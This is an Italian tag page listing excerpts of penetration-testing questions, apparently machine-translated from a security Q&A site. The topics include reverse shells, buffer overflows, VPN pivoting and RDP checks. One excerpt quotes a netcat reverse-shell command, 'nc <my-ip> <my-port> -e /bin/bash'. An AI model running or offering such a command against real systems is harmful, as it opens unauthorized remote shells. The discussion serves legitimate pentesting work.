Domande con tag 'penetration-test'

2
risposte

Pentest: gestisce più shell inverse

Sto facendo un pentest e mi aspetto che le shell inverse da più shell si connetteranno come: - nc <my-ip> <my-port> -e /bin/bash Tuttavia, sto cercando di capire il modo migliore per gestire queste connessioni in entrata. Ci son...
posta 07.12.2013 - 14:52
3
risposte

Le persone sono utilizzate nella sicurezza delle informazioni? (come in UX)

Nel campo UX, le persone vengono utilizzate per aiutare i progettisti a pensare come i futuri utenti finali. Questa tecnica è utilizzata anche nel campo della sicurezza delle informazioni, ovvero pensare come un hacker per dare la priorità ai...
posta 01.03.2017 - 06:48
1
risposta

Conserva in modo sicuro le credenziali per i servizi di applicazioni Web in Apache

Stiamo eseguendo un'applicazione web in python usando wsgi con apache2 e dobbiamo sottoporti a un test di penetrazione. I tester esploreranno il potenziale di danno se gli aggressori ottengono l'accesso alla shell come utente apache. Attualme...
posta 13.06.2012 - 20:46
1
risposta

In che modo gli aggressori raccolgono feedback remoti per identificare e sfruttare i buffer overflow?

I buffer overflow locali sono relativamente facili da capire: lanciare qualche input su un'interfaccia e vedere se il processo fallisce con un core dump o simile. Tuttavia, a mio avviso, questo tipo di exploit funziona bene solo quando l'utente...
posta 19.02.2012 - 19:58
1
risposta

Sito Web di notifica con foro di sicurezza

Come hobby, trovo i buchi di sicurezza che vanno da XSS a SQLi a LFI ecc. in siti web casuali che trovo. (Io non li sfrutto). Ho deciso di fare un po 'di più; Voglio creare un gruppo di volontari composto da hacker che troveranno buchi e li segn...
posta 07.04.2012 - 03:43
3
risposte

Test di penetrazione delle app Web

Ho un sito web statico che deve essere controllato. Ha solo un modulo che aggiorna alcuni dati sul server e lo ho ripetuto con un'iniezione cieca di PHP e SQL. Il sito è ospitato su un server condiviso e ha cpanel. Come dovrei andare sul pent...
posta 28.10.2012 - 09:21
1
risposta

Pivoting di una connessione VPN

Scenario: un utente malintenzionato è connesso tramite VPN a un host remoto sconosciuto. Si presuppone che l'host remoto abbia due NIC, una che serve la VPN e l'altra che serve un'altra sottorete sconosciuta. Inoltre, l'host remoto non è sfrutta...
posta 25.01.2018 - 19:39
3
risposte

Verifica del supporto NLA su Desktop remoto

Qual è il modo migliore per verificare se un server MSRDP ha abilitato o meno l'NLA? Il mio punto di vista è che, se abilitato, non mostrerà una schermata grafica durante il tentativo di connessione, ma chiederà prima le credenziali. Un mo...
posta 09.12.2013 - 09:28
1
risposta

Attacco MITM sventato dalla rete?

Vorrei chiarire che questo non è mirato ad essere un attacco dannoso ed è stato assistito dal dipartimento IT della mia scuola e dal mio insegnante di informatica. È completamente sanzionato. L'obiettivo principale è intercettare un computer,...
posta 10.03.2017 - 00:16
1
risposta

Vocabulary Testing Penetration

I Termini e condizioni su AWS di Amazon vietano le attività denominate "White card" e "Red team e test della squadra blu ". Cosa significano questi termini?     
posta 15.02.2016 - 10:30